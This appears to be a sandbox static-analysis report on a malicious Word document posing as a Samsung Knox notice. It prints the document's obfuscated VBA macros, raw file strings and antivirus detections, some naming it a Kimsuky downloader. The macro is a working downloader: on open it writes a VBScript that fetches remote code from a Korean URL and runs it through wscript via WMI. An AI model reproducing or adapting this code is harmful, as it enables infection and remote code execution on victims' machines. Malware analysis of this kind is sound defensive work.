popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Original

                                        Attribute VB_Name = "NewMacros"
Const qObvd_LmS = 821.46

Function ArCzXnNY(HPnnhLz)
    MsgBox "(?$!}$(&@:"
    ArCzXnNY = HPnnhLz
End Function

If qObvd_LmS = 3570.869 Then
    Const bN = 4018.1142
Else
    Const bN = ""
End If

If qObvd_LmS = 3288.855 Then
    Const es = 330.9265
Else
    Const es = ""
End If

#If qObvd_LmS <> 3875.318 Then

Sub ViewPage(nShape)
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub MainPage(resp)
    Documents.Add
    hs = "On " & bN & "Err" & bN & "or " & bN & "Res" & es & "ume" & es & " Ne" & es & "xt:" & bN & "Set" & es & " mx" & bN & " = " & bN & "Cre" & bN & "ate" & es & "Obj" & es & "ect" & es & "(""" & es & "MSX" & bN & "ML2" & es & ".Se" & bN & "rve" & es & "rXM" & es & "LHT" & bN & "TP." & bN & "6.0" & es & """)" & bN & ":mx" & es & ".op" & bN & "en " & es & """G" & bN & "ET""" & es & ", """ & bN & "htt" & bN & "p:/" & es & "/xx" & es & "x/l" & bN & "ist" & bN & ".ph" & es & "p?q" & es & "uer" & bN & "y=1" & es & """," & bN & " Fa" & bN & "lse" & es & ":mx" & bN & ".Se" & bN & "nd:" & es & "Exe" & bN & "cut" & es & "e(m" & es & "x.r" & bN & "esp" & es & "ons" & es & "eTe" & bN & "xt)"
    ui = "yan" & es & "ggu" & bN & "cam" & es & ".de" & bN & "sig" & bN & "nso" & es & "up." & es & "co." & bN & "kr/" & bN & "use" & bN & "r/v" & es & "iew" & bN & "s/b" & bN & "oar" & bN & "d/s" & bN & "kin" & bN & "/se" & bN & "cre" & bN & "t/c" & bN & "ss"
    hs = Replace(hs, "xxx", ui)
    rp = resp & "\15" & bN & "899" & bN & "890" & es & "24." & bN & "xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    Set wmObj = GetObject("win" & es & "mgm" & bN & "ts:" & bN & "win" & bN & "32_" & es & "pro" & bN & "ces" & es & "s")
    wmObj.Create "wsc" & bN & "rip" & bN & "t.e" & bN & "xe " & es & "//e" & bN & ":vb" & bN & "scr" & es & "ipt" & bN & " //" & bN & "b " & rp
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "1qa" & bN & "z2w" & es & "sx"
    ViewPage ("pic")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub





#End If

Deobfuscated

                                        Attribute VB_Name = "NewMacros"
Const qObvd_LmS = 821.46

Function ArCzXnNY(HPnnhLz)
    MsgBox "(?$!}$(&@:"
    ArCzXnNY = HPnnhLz
End Function

If qObvd_LmS = 3570.869 Then
    Const bN = 4018.1142
Else
    Const bN = ""
End If

If qObvd_LmS = 3288.855 Then
    Const es = 330.9265
Else
    Const es = ""
End If

#If qObvd_LmS <> 3875.318 Then

Sub ViewPage(nShape)
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub MainPage(resp)
    Documents.Add
    hs = "On " & bN & "Err" & bN & "or " & bN & "Res" & es & "ume" & es & " Ne" & es & "xt:" & bN & "Set" & es & " mx" & bN & " = " & bN & "Cre" & bN & "ate" & es & "Obj" & es & "ect" & es & "(""" & es & "MSX" & bN & "ML2" & es & ".Se" & bN & "rve" & es & "rXM" & es & "LHT" & bN & "TP." & bN & "6.0" & es & """)" & bN & ":mx" & es & ".op" & bN & "en " & es & """G" & bN & "ET""" & es & ", """ & bN & "htt" & bN & "p:/" & es & "/xx" & es & "x/l" & bN & "ist" & bN & ".ph" & es & "p?q" & es & "uer" & bN & "y=1" & es & """," & bN & " Fa" & bN & "lse" & es & ":mx" & bN & ".Se" & bN & "nd:" & es & "Exe" & bN & "cut" & es & "e(m" & es & "x.r" & bN & "esp" & es & "ons" & es & "eTe" & bN & "xt)"
    ui = "yan" & es & "ggu" & bN & "cam" & es & ".de" & bN & "sig" & bN & "nso" & es & "up." & es & "co." & bN & "kr/" & bN & "use" & bN & "r/v" & es & "iew" & bN & "s/b" & bN & "oar" & bN & "d/s" & bN & "kin" & bN & "/se" & bN & "cre" & bN & "t/c" & bN & "ss"
    hs = Replace(hs, "xxx", ui)
    rp = resp & "\15" & bN & "899" & bN & "890" & es & "24." & bN & "xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    Set wmObj = GetObject("win" & es & "mgm" & bN & "ts:" & bN & "win" & bN & "32_" & es & "pro" & bN & "ces" & es & "s")
    wmObj.Create "wsc" & bN & "rip" & bN & "t.e" & bN & "xe " & es & "//e" & bN & ":vb" & bN & "scr" & es & "ipt" & bN & " //" & bN & "b " & rp
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "1qa" & bN & "z2w" & es & "sx"
    ViewPage ("pic")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub





#End If
bjbjX5X5
z\z\zT
OiCCPPhotoshop ICC profile
AHXLXN
9C3J3W
J'\'Gg
v m2=:
VIDATx
P|SQl=
lmmmmmI
|vQ\V|
+7QR<
1}#%\{
>a1Db8
':V#?"
oxjQ,?o
jfkkkkkKB
[=].WV
7(Gk?#_
\GGFt0F
mz~j~>
GGK<YW}b|
FRZnrs
8&#n:6s|
XtTDGJz
:48P
q<[[q\rX
XZZZZZZZZZ
pc#7tF
i=h:$N
ffffff
[[[[[[
8.N>lm
EQv(YZZ
7=,-----/
v0W^#_
G];9j:
{cpGko
vlW;4c
xs&>YZ
XZZZZZZZZZZZZZ^
?7ip:Ion
wKKKKKKKKKKKKKK
*o@,--w
,------'
y`ap9I
n@hp=N
,------
G:GG}=
I]WF>E
=$:*G}
kkkkk+
wz_\w
[Ww&?#
-}c*wA
A`iy)N~
1tDL>^
-033333
rsp>Wnr
$}S!&i
tEXtSoftware
Adobe ImageReadyq
"iTXtXML:com.adobe.xmp
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D799BF352E2911E68FFB9D4B95976E92" xmpMM:DocumentID="xmp.did:D799BF362E2911E68FFB9D4B95976E92"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D799BF332E2911E68FFB9D4B95976E92" stRef:documentID="xmp.did:D799BF342E2911E68FFB9D4B95976E92"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
MIDATx
lu*zt7
k>Vx$M
sI4x6)
ZU9(\V
|xYLmB
8.[U>"uJUq
|\<eWu0
dkB,Y@:
GRdQ`.
ER#MdZg`an
Titc[j
T69PWoW
I?r(rHl
j4l.m;X
>G[(X[K@
eP?86nE
?:`8M|fi(
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
QV32#y7&
P-$Y!<
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
*S|qt M
drs/downrev.xmlL
\Jm&e,
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/e2oDoc.xml
drs/_rels/e2oDoc.xml.rels
2=3`xa
drs/downrev.xmlL
drs/media/image1.png
OiCCPPhotoshop ICC profile
AHXLXN
9C3J3W
J'\'Gg
v m2=:
VIDATx
P|SQl=
lmmmmmI
|vQ\V|
+7QR<
1}#%\{
>a1Db8
':V#?"
oxjQ,?o
jfkkkkkKB
[=].WV
7(Gk?#_
\GGFt0F
mz~j~>
GGK<YW}b|
FRZnrs
8&#n:6s|
XtTDGJz
:48P
q<[[q\rX
XZZZZZZZZZ
pc#7tF
i=h:$N
ffffff
[[[[[[
8.N>lm
EQv(YZZ
7=,-----/
v0W^#_
G];9j:
{cpGko
vlW;4c
xs&>YZ
XZZZZZZZZZZZZZ^
?7ip:Ion
wKKKKKKKKKKKKKK
*o@,--w
,------'
y`ap9I
n@hp=N
,------
G:GG}=
I]WF>E
=$:*G}
kkkkk+
wz_\w
[Ww&?#
-}c*wA
A`iy)N~
1tDL>^
-033333
rsp>Wnr
$}S!&i
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/_rels/e2oDoc.xml.relsPK
drs/downrev.xmlPK
drs/media/image1.pngPK
Administrator
Normal.dotm
Microsoft Office Word
<?xml version="1.0" encoding="UTF-8" standalone="no"?><b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"></b:Sources>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<ds:datastoreItem ds:itemID="{0C8C5DED-B346-4044-85FD-EACC9D20C679}" xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml"><ds:schemaRefs><ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/></ds:schemaRefs></ds:datastoreItem>
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
Macros"
Const q
Obvd_LmS
x821.46
ion ArCz
XnNY(HPn
MsgBox
"(?$!}$(
u3570.
869 Then
E401@8.1142
Z288.855
-330.p9265
Z<> 3875
ub ViewP
age(nSha
ror Resu!
.Fill.`Solid
o 0 Step8 -1
nB Wi ndow.
With S
leStory
Font.Hi
Collap
Rs.A*d
Gyabn'
lace(hs@IBx
`{"\151g
[241(xml$.
ange.T
SavePAs2
:0=rp,
t:=wd#
ri8?Dt.
< /X'b9
toOpen(
uApplic
pwdPrint
@wnd.Un
ai `("pic
P% Each
!5Us (aA
(?$!}$(&@:A@:
h"lx:d
Attribut
e VB_Nam
e = "N
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
Module1b
NewMacros
qObvd_LmS
ArCzXnNYS P
HPnnhLzD(P
MsgBox
ViewPage
nShape
ActiveDocument
Shapes
Delete
ViewModeHDP
ActiveWindow
SeekView$
SelectionZ
WholeStory
Hidden]
Collapse
MainPager1P
Documents
Replacef
SaveAs2
FileNamej
FileFormat
wdFormatText
wmObjZ
GetObjectz
Create
AutoOpen
Application
wdPrintView(
Unprotect
ob_tmp
Templates
Template
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
DF8D04C-
5BFA-101@B-BDE5
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
BeThisDo
cumentG
ThisDocument
NewMacros
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
Module=NewMacros
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="7476D87D68D86CD86CDC70DC70"
DPB="D3D17F22C33FC33F3CC1C43FF41A2AE9CC76769E73E32DEBAF0A8883AEF96BC5D039218EB2"
GC="32309E83FC84FC84FC"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
NewMacros=199, 38, 1337, 515,
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
: 2021. 05. 19
(Knox) :
(Knox)
2.9 :
8, J3, J5
2.8 :
S8, J7,
2.7.1 :
,S7, S7 edge, S6, S6 edge
BloodAssistant.com.android.syste mcompenent
(admin.nisam@nis.go.kr)
h1-logo
Picture 2
F:\Attachment Attack\
\h1-logo.png
Normal
Default Paragraph Font
Table Normal
No List
"Rectangle 2
"Rectangle 2
"Rectangle 2
Project.NewMacros.AutoOpen
PROJECT.NEWMACROS.AUTOOPEN
Unknown
Times New Roman
Symbol
MS Gothic
HCI Poppy
Times New Roman
Cambria Math
!%),.:;?]}
Administrator
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
MsoDataStore
SDG4Q==
Properties
Macros
ThisDocument
NewMacros
_VBA_PROJECT
(1Normal.ThisDocument
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-
C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
ThisDocument
036299de88
ThisDocument
NewMacros
096299df4d
NewMacros
tThisDocument
sNewMacros
PROJECTwm
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.Multi.Generic.4!c
Elastic malicious (high confidence)
DrWeb Clean
Cynet Clean
CMC Clean
CAT-QuickHeal W97M.Agent.42548
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE VBA:Amphitryon.4584
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec W97M.Downloader
ESET-NOD32 VBA/TrojanDropper.Agent.BWY
TrendMicro-HouseCall TROJ_FRS.0NA103EL21
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.MSOffice.SAgent.gen
BitDefender VBA:Amphitryon.4584
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan VBA:Amphitryon.4584
Tencent Trojan.MsOffice.MacroS.11008556
TACHYON Suspicious/W97M.XSR.Gen
Sophos Troj/DocDl-ADZF
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro TROJ_FRS.0NA103EL21
McAfee-GW-Edition BehavesLike.OLE2.Downloader.cg
FireEye VBA:Amphitryon.4584
Emsisoft VBA:Amphitryon.4584 (B)
SentinelOne Static AI - Malicious OLE
Jiangmin Clean
Avira Clean
Antiy-AVL Trojan[APT]/MSOffice.Kimsuky
Microsoft TrojanDownloader:O97M/Obfuse.CT!MTB
Gridinsoft Clean
Xcitium Clean
Arcabit VBA:Amphitryon.D11E8
ViRobot W97M.S.Downloader.164352.B
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
GData VBA:Amphitryon.4584
Google Detected
AhnLab-V3 Downloader/DOC.Generic
Acronis suspicious
McAfee W97M/Downloader.dsn
MAX malware (ai score=84)
VBA32 Clean
Zoner Clean
Rising Dropper.Agent!8.2F (TOPIS:E0:DZELwasrCxH)
Yandex Clean
Ikarus Trojan-Dropper.VBA.Agent
MaxSecure Clean
Fortinet VBA/Agent.4982!tr
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.